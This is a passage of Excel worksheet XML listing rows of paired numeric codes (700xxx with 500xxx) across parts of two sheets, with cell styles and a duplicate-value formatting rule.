      <c r="A620" s="5">
        <v>700111</v>
      </c>
      <c r="B620" s="3">
        <v>500094</v>
      </c>
    </row>
    <row r="621" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A621" s="5">
        <v>700461</v>
      </c>
      <c r="B621" s="4">
        <v>500092</v>
      </c>
    </row>
    <row r="622" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A622" s="5">
        <v>700195</v>
      </c>
      <c r="B622" s="3">
        <v>500053</v>
      </c>
    </row>
    <row r="623" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A623" s="5">
        <v>700195</v>
      </c>
      <c r="B623" s="3">
        <v>500080</v>
      </c>
    </row>
    <row r="624" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A624" s="5">
        <v>700195</v>
      </c>
      <c r="B624" s="3">
        <v>500016</v>
      </c>
    </row>
    <row r="625" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A625" s="5">
        <v>700195</v>
      </c>
      <c r="B625" s="3">
        <v>500091</v>
      </c>
    </row>
    <row r="626" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A626" s="5">
        <v>700053</v>
      </c>
      <c r="B626" s="3">
        <v>500016</v>
      </c>
    </row>
    <row r="627" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A627" s="5">
        <v>700345</v>
      </c>
      <c r="B627" s="4">
        <v>500006</v>
      </c>
    </row>
    <row r="628" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A628" s="5">
        <v>700185</v>
      </c>
      <c r="B628" s="4">
        <v>500049</v>
      </c>
    </row>
    <row r="629" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A629" s="5">
        <v>700382</v>
      </c>
      <c r="B629" s="4">
        <v>500092</v>
      </c>
    </row>
    <row r="630" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A630" s="5">
        <v>700596</v>
      </c>
      <c r="B630" s="3">
        <v>500096</v>
      </c>
    </row>
    <row r="631" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A631" s="5">
        <v>700596</v>
      </c>
      <c r="B631" s="3">
        <v>500081</v>
      </c>
    </row>
    <row r="632" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A632" s="5">
        <v>700596</v>
      </c>
      <c r="B632" s="3">
        <v>500060</v>
      </c>
    </row>
    <row r="633" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A633" s="5">
        <v>700596</v>
      </c>
      <c r="B633" s="3">
        <v>500131</v>
      </c>
    </row>
    <row r="634" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A634" s="5">
        <v>700546</v>
      </c>
      <c r="B634" s="4">
        <v>500021</v>
      </c>
    </row>
    <row r="635" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A635" s="5">
        <v>700450</v>
      </c>
      <c r="B635" s="4">
        <v>500069</v>
      </c>
    </row>
    <row r="636" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A636" s="5">
        <v>700444</v>
      </c>
      <c r="B636" s="4">
        <v>500103</v>
      </c>
    </row>
    <row r="637" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A637" s="5">
        <v>700445</v>
      </c>
      <c r="B637" s="4">
        <v>500103</v>
      </c>
    </row>
    <row r="638" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A638" s="5">
        <v>700028</v>
      </c>
      <c r="B638" s="4">
        <v>500013</v>
      </c>
    </row>
    <row r="639" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A639" s="5">
        <v>700063</v>
      </c>
      <c r="B639" s="4">
        <v>500022</v>
      </c>
    </row>
    <row r="640" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A640" s="5">
        <v>700217</v>
      </c>
      <c r="B640" s="4">
        <v>500067</v>
      </c>
    </row>
    <row r="641" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A641" s="5">
        <v>700589</v>
      </c>
      <c r="B641" s="4">
        <v>500016</v>
      </c>
    </row>
    <row r="642" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A642" s="5">
        <v>700610</v>
      </c>
      <c r="B642" s="4">
        <v>500049</v>
      </c>
    </row>
    <row r="643" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A643" s="5">
        <v>700633</v>
      </c>
      <c r="B643" s="4">
        <v>500016</v>
      </c>
    </row>
    <row r="644" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A644" s="5">
        <v>700218</v>
      </c>
      <c r="B644" s="4">
        <v>500067</v>
      </c>
    </row>
    <row r="645" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A645" s="5">
        <v>700159</v>
      </c>
      <c r="B645" s="4">
        <v>500045</v>
      </c>
    </row>
    <row r="646" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A646" s="5">
        <v>700627</v>
      </c>
      <c r="B646" s="4">
        <v>500045</v>
      </c>
    </row>
    <row r="647" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A647" s="5">
        <v>700615</v>
      </c>
      <c r="B647" s="4">
        <v>500132</v>
      </c>
    </row>
    <row r="648" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A648" s="5">
        <v>700516</v>
      </c>
      <c r="B648" s="4">
        <v>500016</v>
      </c>
    </row>
    <row r="649" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A649" s="5">
        <v>700157</v>
      </c>
      <c r="B649" s="4">
        <v>500050</v>
      </c>
    </row>
    <row r="650" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A650" s="5">
        <v>700035</v>
      </c>
      <c r="B650" s="4">
        <v>500013</v>
      </c>
    </row>
    <row r="651" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A651" s="5">
        <v>700543</v>
      </c>
      <c r="B651" s="4">
        <v>500021</v>
      </c>
    </row>
    <row r="652" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A652" s="5">
        <v>700646</v>
      </c>
      <c r="B652" s="4">
        <v>500080</v>
      </c>
    </row>
    <row r="653" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A653" s="5">
        <v>700227</v>
      </c>
      <c r="B653" s="4">
        <v>500004</v>
      </c>
    </row>
    <row r="654" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A654" s="5">
        <v>700225</v>
      </c>
      <c r="B654" s="4">
        <v>500130</v>
      </c>
    </row>
    <row r="655" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A655" s="5">
        <v>700390</v>
      </c>
      <c r="B655" s="4">
        <v>500046</v>
      </c>
    </row>
    <row r="656" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A656" s="5">
        <v>700058</v>
      </c>
      <c r="B656" s="4">
        <v>500019</v>
      </c>
    </row>
    <row r="657" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A657" s="5">
        <v>700188</v>
      </c>
      <c r="B657" s="4">
        <v>500054</v>
      </c>
    </row>
    <row r="658" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A658" s="5">
        <v>700380</v>
      </c>
      <c r="B658" s="4">
        <v>500064</v>
      </c>
    </row>
    <row r="659" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A659" s="5">
        <v>700142</v>
      </c>
      <c r="B659" s="4">
        <v>500009</v>
      </c>
    </row>
    <row r="660" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A660" s="5">
        <v>700491</v>
      </c>
      <c r="B660" s="4">
        <v>500056</v>
      </c>
    </row>
    <row r="661" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A661" s="5">
        <v>700559</v>
      </c>
      <c r="B661" s="4">
        <v>500016</v>
      </c>
    </row>
    <row r="662" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A662" s="5">
        <v>700562</v>
      </c>
      <c r="B662" s="4">
        <v>500016</v>
      </c>
    </row>
    <row r="663" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A663" s="5">
        <v>700060</v>
      </c>
      <c r="B663" s="4">
        <v>500019</v>
      </c>
    </row>
    <row r="664" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A664" s="5">
        <v>700096</v>
      </c>
      <c r="B664" s="3">
        <v>500071</v>
      </c>
    </row>
    <row r="665" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A665" s="5">
        <v>700096</v>
      </c>
      <c r="B665" s="3">
        <v>500004</v>
      </c>
    </row>
    <row r="666" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A666" s="5">
        <v>700096</v>
      </c>
      <c r="B666" s="3">
        <v>500072</v>
      </c>
    </row>
    <row r="667" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A667" s="5">
        <v>700096</v>
      </c>
      <c r="B667" s="3">
        <v>500019</v>
      </c>
    </row>
    <row r="668" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A668" s="5">
        <v>700096</v>
      </c>
      <c r="B668" s="3">
        <v>500049</v>
      </c>
    </row>
    <row r="669" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A669" s="5">
        <v>700096</v>
      </c>
      <c r="B669" s="3">
        <v>500018</v>
      </c>
    </row>
    <row r="670" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A670" s="5">
        <v>700096</v>
      </c>
      <c r="B670" s="3">
        <v>500010</v>
      </c>
    </row>
    <row r="671" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A671" s="5">
        <v>700096</v>
      </c>
      <c r="B671" s="3">
        <v>500016</v>
      </c>
    </row>
    <row r="672" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A672" s="5">
        <v>700586</v>
      </c>
      <c r="B672" s="4">
        <v>500032</v>
      </c>
    </row>
    <row r="673" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A673" s="5">
        <v>700057</v>
      </c>
      <c r="B673" s="3">
        <v>500049</v>
      </c>
    </row>
    <row r="674" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A674" s="5">
        <v>700057</v>
      </c>
      <c r="B674" s="3">
        <v>500004</v>
      </c>
    </row>
    <row r="675" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A675" s="5">
        <v>700057</v>
      </c>
      <c r="B675" s="3">
        <v>500009</v>
      </c>
    </row>
    <row r="676" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A676" s="5">
        <v>700057</v>
      </c>
      <c r="B676" s="3">
        <v>500006</v>
      </c>
    </row>
    <row r="677" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A677" s="5">
        <v>700057</v>
      </c>
      <c r="B677" s="3">
        <v>500010</v>
      </c>
    </row>
    <row r="678" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A678" s="5">
        <v>700057</v>
      </c>
      <c r="B678" s="3">
        <v>500072</v>
      </c>
    </row>
    <row r="679" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A679" s="5">
        <v>700057</v>
      </c>
      <c r="B679" s="3">
        <v>500019</v>
      </c>
    </row>
    <row r="680" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A680" s="5">
        <v>700057</v>
      </c>
      <c r="B680" s="3">
        <v>500016</v>
      </c>
    </row>
    <row r="681" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A681" s="5">
        <v>700164</v>
      </c>
      <c r="B681" s="4">
        <v>500052</v>
      </c>
    </row>
    <row r="682" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A682" s="5">
        <v>700560</v>
      </c>
      <c r="B682" s="4">
        <v>500016</v>
      </c>
    </row>
    <row r="683" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A683" s="5">
        <v>700146</v>
      </c>
      <c r="B683" s="4">
        <v>500046</v>
      </c>
    </row>
    <row r="684" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A684" s="5">
        <v>700131</v>
      </c>
      <c r="B684" s="4">
        <v>500040</v>
      </c>
    </row>
    <row r="685" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A685" s="5">
        <v>700004</v>
      </c>
      <c r="B685" s="4">
        <v>500003</v>
      </c>
    </row>
    <row r="686" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A686" s="5">
        <v>700183</v>
      </c>
      <c r="B686" s="3">
        <v>500016</v>
      </c>
    </row>
    <row r="687" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A687" s="5">
        <v>700183</v>
      </c>
      <c r="B687" s="3">
        <v>500132</v>
      </c>
    </row>
    <row r="688" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A688" s="5">
        <v>700183</v>
      </c>
      <c r="B688" s="3">
        <v>500065</v>
      </c>
    </row>
    <row r="689" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A689" s="5">
        <v>700183</v>
      </c>
      <c r="B689" s="3">
        <v>500007</v>
      </c>
    </row>
    <row r="690" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A690" s="5">
        <v>700266</v>
      </c>
      <c r="B690" s="3">
        <v>500092</v>
      </c>
    </row>
    <row r="691" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A691" s="5">
        <v>700266</v>
      </c>
      <c r="B691" s="3">
        <v>500102</v>
      </c>
    </row>
    <row r="692" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A692" s="5">
        <v>700094</v>
      </c>
      <c r="B692" s="3">
        <v>500035</v>
      </c>
    </row>
    <row r="693" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A693" s="5">
        <v>700094</v>
      </c>
      <c r="B693" s="3">
        <v>500074</v>
      </c>
    </row>
    <row r="694" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A694" s="5">
        <v>700178</v>
      </c>
      <c r="B694" s="4">
        <v>500056</v>
      </c>
    </row>
    <row r="695" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A695" s="5">
        <v>700436</v>
      </c>
      <c r="B695" s="4">
        <v>500098</v>
      </c>
    </row>
    <row r="696" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A696" s="5">
        <v>700647</v>
      </c>
      <c r="B696" s="4">
        <v>500135</v>
      </c>
    </row>
    <row r="697" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A697" s="5">
        <v>700199</v>
      </c>
      <c r="B697" s="4">
        <v>500064</v>
      </c>
    </row>
    <row r="698" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A698" s="5">
        <v>700263</v>
      </c>
      <c r="B698" s="4">
        <v>500032</v>
      </c>
    </row>
    <row r="699" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A699" s="5">
        <v>700130</v>
      </c>
      <c r="B699" s="4">
        <v>500040</v>
      </c>
    </row>
    <row r="700" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A700" s="5">
        <v>700275</v>
      </c>
      <c r="B700" s="4">
        <v>500045</v>
      </c>
    </row>
    <row r="701" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A701" s="5">
        <v>700022</v>
      </c>
      <c r="B701" s="4">
        <v>500010</v>
      </c>
    </row>
    <row r="702" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A702" s="5">
        <v>700386</v>
      </c>
      <c r="B702" s="4">
        <v>500127</v>
      </c>
    </row>
    <row r="703" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A703" s="5">
        <v>700452</v>
      </c>
      <c r="B703" s="4">
        <v>500081</v>
      </c>
    </row>
    <row r="704" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A704" s="5">
        <v>700136</v>
      </c>
      <c r="B704" s="4">
        <v>500007</v>
      </c>
    </row>
    <row r="705" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A705" s="5">
        <v>700476</v>
      </c>
      <c r="B705" s="4">
        <v>500127</v>
      </c>
    </row>
    <row r="706" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A706" s="5">
        <v>700636</v>
      </c>
      <c r="B706" s="4">
        <v>500016</v>
      </c>
    </row>
    <row r="707" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A707" s="5">
        <v>700207</v>
      </c>
      <c r="B707" s="4">
        <v>500066</v>
      </c>
    </row>
    <row r="708" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A708" s="5">
        <v>700442</v>
      </c>
      <c r="B708" s="4">
        <v>500100</v>
      </c>
    </row>
    <row r="709" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A709" s="5">
        <v>700180</v>
      </c>
      <c r="B709" s="4">
        <v>500032</v>
      </c>
    </row>
    <row r="710" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A710" s="5">
        <v>700366</v>
      </c>
      <c r="B710" s="4">
        <v>500032</v>
      </c>
    </row>
    <row r="711" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A711" s="5">
        <v>700612</v>
      </c>
      <c r="B711" s="4">
        <v>500119</v>
      </c>
    </row>
    <row r="712" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A712" s="5">
        <v>700579</v>
      </c>
      <c r="B712" s="4">
        <v>500098</v>
      </c>
    </row>
    <row r="713" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A713" s="5">
        <v>700109</v>
      </c>
      <c r="B713" s="4">
        <v>500006</v>
      </c>
    </row>
    <row r="714" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A714" s="5">
        <v>700515</v>
      </c>
      <c r="B714" s="4">
        <v>500016</v>
      </c>
    </row>
    <row r="715" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A715" s="5">
        <v>700514</v>
      </c>
      <c r="B715" s="4">
        <v>500016</v>
      </c>
    </row>
    <row r="716" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A716" s="5">
        <v>700645</v>
      </c>
      <c r="B716" s="4">
        <v>500007</v>
      </c>
    </row>
    <row r="717" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A717" s="5">
        <v>700206</v>
      </c>
      <c r="B717" s="4">
        <v>500066</v>
      </c>
    </row>
    <row r="718" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A718" s="5">
        <v>700005</v>
      </c>
      <c r="B718" s="3">
        <v>500060</v>
      </c>
    </row>
    <row r="719" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A719" s="5">
        <v>700005</v>
      </c>
      <c r="B719" s="3">
        <v>500037</v>
      </c>
    </row>
    <row r="720" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A720" s="5">
        <v>700005</v>
      </c>
      <c r="B720" s="3">
        <v>500053</v>
      </c>
    </row>
    <row r="721" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A721" s="5">
        <v>700005</v>
      </c>
      <c r="B721" s="3">
        <v>500027</v>
      </c>
    </row>
    <row r="722" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A722" s="5">
        <v>700005</v>
      </c>
      <c r="B722" s="3">
        <v>500087</v>
      </c>
    </row>
    <row r="723" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A723" s="5">
        <v>700005</v>
      </c>
      <c r="B723" s="3">
        <v>500065</v>
      </c>
    </row>
    <row r="724" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A724" s="5">
        <v>700005</v>
      </c>
      <c r="B724" s="3">
        <v>500093</v>
      </c>
    </row>
    <row r="725" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A725" s="5">
        <v>700155</v>
      </c>
      <c r="B725" s="4">
        <v>500050</v>
      </c>
    </row>
    <row r="726" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A726" s="5">
        <v>700466</v>
      </c>
      <c r="B726" s="4">
        <v>500112</v>
      </c>
    </row>
    <row r="727" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A727" s="5">
        <v>700219</v>
      </c>
      <c r="B727" s="4">
        <v>500067</v>
      </c>
    </row>
    <row r="728" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A728" s="5">
        <v>700191</v>
      </c>
      <c r="B728" s="3">
        <v>500007</v>
      </c>
    </row>
    <row r="729" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A729" s="5">
        <v>700191</v>
      </c>
      <c r="B729" s="3">
        <v>500091</v>
      </c>
    </row>
    <row r="730" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A730" s="5">
        <v>700191</v>
      </c>
      <c r="B730" s="3">
        <v>500105</v>
      </c>
    </row>
    <row r="731" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A731" s="5">
        <v>700176</v>
      </c>
      <c r="B731" s="4">
        <v>500055</v>
      </c>
    </row>
    <row r="732" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A732" s="5">
        <v>700059</v>
      </c>
      <c r="B732" s="4">
        <v>500019</v>
      </c>
    </row>
    <row r="733" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A733" s="5">
        <v>700430</v>
      </c>
      <c r="B733" s="4">
        <v>500096</v>
      </c>
    </row>
    <row r="734" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A734" s="5">
        <v>700141</v>
      </c>
      <c r="B734" s="4">
        <v>500044</v>
      </c>
    </row>
    <row r="735" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A735" s="5">
        <v>700314</v>
      </c>
      <c r="B735" s="4">
        <v>500007</v>
      </c>
    </row>
    <row r="736" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A736" s="5">
        <v>700161</v>
      </c>
      <c r="B736" s="4">
        <v>500007</v>
      </c>
    </row>
    <row r="737" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A737" s="5">
        <v>700653</v>
      </c>
      <c r="B737" s="4">
        <v>500136</v>
      </c>
    </row>
    <row r="738" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A738" s="5">
        <v>700123</v>
      </c>
      <c r="B738" s="4">
        <v>500006</v>
      </c>
    </row>
    <row r="739" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A739" s="5">
        <v>700117</v>
      </c>
      <c r="B739" s="3">
        <v>500007</v>
      </c>
    </row>
    <row r="740" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A740" s="5">
        <v>700388</v>
      </c>
      <c r="B740" s="4">
        <v>500081</v>
      </c>
    </row>
    <row r="741" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A741" s="5">
        <v>700251</v>
      </c>
      <c r="B741" s="4">
        <v>500007</v>
      </c>
    </row>
    <row r="742" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A742" s="5">
        <v>700230</v>
      </c>
      <c r="B742" s="4">
        <v>500062</v>
      </c>
    </row>
    <row r="743" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A743" s="5">
        <v>700086</v>
      </c>
      <c r="B743" s="4">
        <v>500031</v>
      </c>
    </row>
    <row r="744" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A744" s="5">
        <v>700350</v>
      </c>
      <c r="B744" s="4">
        <v>500014</v>
      </c>
    </row>
    <row r="745" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A745" s="5">
        <v>700412</v>
      </c>
      <c r="B745" s="3">
        <v>500096</v>
      </c>
    </row>
    <row r="746" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A746" s="5">
        <v>700412</v>
      </c>
      <c r="B746" s="3">
        <v>500001</v>
      </c>
    </row>
    <row r="747" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A747" s="5">
        <v>700412</v>
      </c>
      <c r="B747" s="3">
        <v>500027</v>
      </c>
    </row>
  </sheetData>
  <phoneticPr fontId="1" type="noConversion"/>
  <conditionalFormatting sqref="E2:E747">
    <cfRule type="duplicateValues" dxfId="7" priority="16"/>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64AE7-0690-4ECA-BD9B-DCB223AD2E77}">
  <dimension ref="A1:B747"/>
  <sheetViews>
    <sheetView topLeftCell="A733" zoomScaleNormal="100" workbookViewId="0">
      <selection activeCell="G737" sqref="G737"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="13.8" x14ac:dyDescent="0.25"/>
  <sheetData>
    <row r="1" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1" s="3" t="s">
        <v>8</v>
      </c>
      <c r="B1" s="3" t="s">
        <v>7</v>
      </c>
    </row>
    <row r="2" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2" s="5">
        <v>500018</v>
      </c>
      <c r="B2" s="3">
        <v>700043</v>
      </c>
    </row>
    <row r="3" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A3" s="5">
        <v>500018</v>
      </c>
      <c r="B3" s="3">
        <v>700100</v>
      </c>
    </row>
    <row r="4" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A4" s="5">
        <v>500018</v>
      </c>
      <c r="B4" s="3">
        <v>700042</v>
      </c>
    </row>
    <row r="5" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A5" s="5">
        <v>500018</v>
      </c>
      <c r="B5" s="3">
        <v>700039</v>
      </c>
    </row>
    <row r="6" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A6" s="5">
        <v>500018</v>
      </c>
      <c r="B6" s="3">
        <v>700104</v>
      </c>
    </row>
    <row r="7" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A7" s="5">
        <v>500018</v>
      </c>
      <c r="B7" s="3">
        <v>700012</v>
      </c>
    </row>
    <row r="8" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A8" s="5">
        <v>500018</v>
      </c>
      <c r="B8" s="3">
        <v>700096</v>
      </c>
    </row>
    <row r="9" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A9" s="5">
        <v>500130</v>
      </c>
      <c r="B9" s="3">
        <v>700224</v>
      </c>
    </row>
    <row r="10" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A10" s="5">
        <v>500130</v>
      </c>
      <c r="B10" s="3">
        <v>700225</v>
      </c>
    </row>
    <row r="11" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A11" s="5">
        <v>500138</v>
      </c>
      <c r="B11" s="3">
        <v>700032</v>
      </c>
    </row>
    <row r="12" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A12" s="5">
        <v>500138</v>
      </c>
      <c r="B12" s="3">
        <v>700433</v>
      </c>
    </row>
    <row r="13" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A13" s="5">
        <v>500099</v>
      </c>
      <c r="B13" s="3">
        <v>700434</v>
      </c>
    </row>
    <row r="14" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A14" s="5">
        <v>500006</v>
      </c>
      <c r="B14" s="3">
        <v>700017</v>
      </c>
    </row>
    <row r="15" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A15" s="5">
        <v>500006</v>
      </c>
      <c r="B15" s="3">
        <v>700119</v>
      </c>
    </row>
    <row r="16" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A16" s="5">
        <v>500006</v>
      </c>
      <c r="B16" s="3">
        <v>700025</v>
      </c>
    </row>
    <row r="17" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A17" s="5">
        <v>500006</v>
      </c>
      <c r="B17" s="3">
        <v>700026</v>
      </c>
    </row>
    <row r="18" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A18" s="5">
        <v>500006</v>
      </c>
      <c r="B18" s="3">
        <v>700008</v>
      </c>
    </row>
    <row r="19" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A19" s="5">
        <v>500006</v>
      </c>
      <c r="B19" s="3">
        <v>700100</v>
      </c>
    </row>
    <row r="20" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A20" s="5">
        <v>500006</v>
      </c>
      <c r="B20" s="3">
        <v>700121</v>
      </c>
    </row>
    <row r="21" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A21" s="5">
        <v>500006</v>
      </c>
      <c r="B21" s="3">
        <v>700002</v>
      </c>
    </row>
    <row r="22" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A22" s="5">
        <v>500006</v>
      </c>
      <c r="B22" s="3">
        <v>700039</v>
      </c>
    </row>
    <row r="23" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A23" s="5">
        <v>500006</v>
      </c>
      <c r="B23" s="3">
        <v>700122</v>
      </c>
    </row>
    <row r="24" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A24" s="5">
        <v>500006</v>
      </c>
      <c r="B24" s="3">
        <v>700012</v>
      </c>
    </row>
    <row r="25" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A25" s="5">
        <v>500006</v>
      </c>
      <c r="B25" s="3">
        <v>700029</v>
      </c>
    </row>
    <row r="26" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A26" s="5">
        <v>500006</v>
      </c>
      <c r="B26" s="3">
        <v>700006</v>
      </c>
    </row>
    <row r="27" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A27" s="5">
        <v>500006</v>
      </c>
      <c r="B27" s="3">
        <v>700345</v>
      </c>
    </row>
    <row r="28" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A28" s="5">
        <v>500006</v>
      </c>
      <c r="B28" s="3">
        <v>700057</v>
      </c>
    </row>
    <row r="29" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A29" s="5">
        <v>500006</v>
      </c>
      <c r="B29" s="3">
        <v>700109</v>
      </c>
    </row>
    <row r="30" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A30" s="5">
        <v>500006</v>
      </c>
      <c r="B30" s="3">
        <v>700123</v>
      </c>
    </row>
    <row r="31" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A31" s="5">
        <v>500005</v>
      </c>
      <c r="B31" s="3">
        <v>700040</v>
      </c>
    </row>
    <row r="32" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A32" s="5">
        <v>500005</v>
      </c>
      <c r="B32" s="3">
        <v>700015</v>
      </c>
    </row>
    <row r="33" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A33" s="5">
        <v>500005</v>
      </c>
      <c r="B33" s="3">
        <v>700003</v>
      </c>
    </row>
    <row r="34" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A34" s="5">
        <v>500023</v>
      </c>
      <c r="B34" s="3">
        <v>700064</v>
      </c>
    </row>
